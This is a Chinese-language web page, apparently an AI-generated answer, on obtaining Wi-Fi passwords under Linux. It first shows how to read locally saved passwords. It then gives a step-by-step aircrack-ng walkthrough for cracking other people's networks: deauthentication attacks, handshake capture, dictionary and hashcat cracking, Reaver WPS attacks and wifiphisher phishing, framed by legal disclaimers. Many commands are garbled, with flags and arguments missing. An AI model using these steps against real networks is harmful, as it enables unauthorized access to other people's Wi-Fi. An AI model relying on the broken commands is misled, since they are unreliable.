linux怎么套取wifi密码
linux怎么套取wifi密码详细介绍
在 Linux 系统中获取或破解 Wi-Fi 密码涉及技术操作与法律风险,需严格遵守使用规范。以下分场景介绍方法,并强调合法性与注意事项。
一、获取已连接的 Wi-Fi 密码
若需查看本地已保存的 Wi-Fi 密码(如忘记密码或配置备份),可通过系统配置文件或命令行工具实现。
1. 查看配置文件(适用于 NetworkManager 管理的网络)
- 路径:
/etc/NetworkManager/system-connections/
该目录下每个文件对应一个已保存的 Wi-Fi 连接,文件名通常为网络名称。 - 命令示例:bash
/etc/NetworkManager/system-connections/网络名称输出中的
psk=后即为明文密码(部分系统可能存储为加密形式,需进一步解密)。
2. 使用
nmcli 命令
- 列出所有连接:bash
nmcli connection show - 查看指定连接的密码:bash
nmcli connection show 网络名称需注意,若密码存储在密钥环中,可能需要输入用户登录密码解锁。
3. 图形界面操作(如 GNOME 桌面)
- 进入 设置 > 网络 > Wi-Fi,选择已连接的网络,点击 齿轮图标 > 安全,勾选 显示密码。
二、破解他人 Wi-Fi 密码(渗透测试场景)
此方法需严格遵守法律,仅可在授权网络中进行。以下以 Kali Linux 为例,使用 aircrack-ng 套件演示。
1. 硬件准备
- 无线网卡:需支持 监控模式 和 数据包注入,推荐型号如 Alfa AWUS036ACH、TP-Link Archer T6E。
- 检查兼容性:bash
iw list
2. 基础步骤
- 切换至监控模式:bash
airmon-ng start wlan0 - 扫描附近网络:bash
airodump-ng wlan0mon - 捕获握手包:bash
airodump-ng 目标 BSSID 信道 capture wlan0mon- 触发握手包:若目标网络无活动连接,可发送 Deauthentication 攻击:bash
aireplay-ng 目标 BSSID 客户端 MAC wlan0mon
- 触发握手包:若目标网络无活动连接,可发送 Deauthentication 攻击:bash
- 字典攻击破解:bash
aircrack-ng 字典路径 目标 BSSID capture-01.cap- 推荐字典:
/usr/share/wordlists/rockyou.txt(需提前安装)。
- 推荐字典:
3. 进阶工具与技巧
- Hashcat(GPU 加速破解):bash
hcxpcapngtool hashcat.hccapx capture.caphashcat hashcat.hccapx 字典路径
- Reaver(针对 WPS 漏洞):bash
reaver wlan0mon 目标 BSSID - 钓鱼攻击(wifiphisher):bash
wifiphisher
三、法律与道德风险
- 未经授权破解违法:根据《中华人民共和国网络安全法》第二十七条,非法侵入他人网络系统最高可处三年以下有期徒刑。
- 数据安全风险:破解工具可能携带恶意代码,或导致设备被远程控制。
- 伦理责任:尊重他人隐私,仅在授权范围内进行测试。
四、注意事项
- 加密强度:WPA3 网络目前无法有效破解,WPA2 需强密码字典。
- 信号强度:目标 AP 信号需足够强(PWR > -60 dBm),否则破解效率极低。
- 系统兼容性:部分 Linux 发行版(如 Ubuntu)需手动安装
aircrack-ng:bashupdate aircrack-ng
五、合法替代方案
- 企业安全测试:使用
Wireshark分析网络流量,或通过Nessus扫描无线漏洞。 - 家庭网络管理:定期修改密码,启用 WPA3 加密,关闭 WPS 功能。
若需进一步了解无线安全技术,建议参考官方文档(如 Aircrack-ng 官网)或参与合规培训。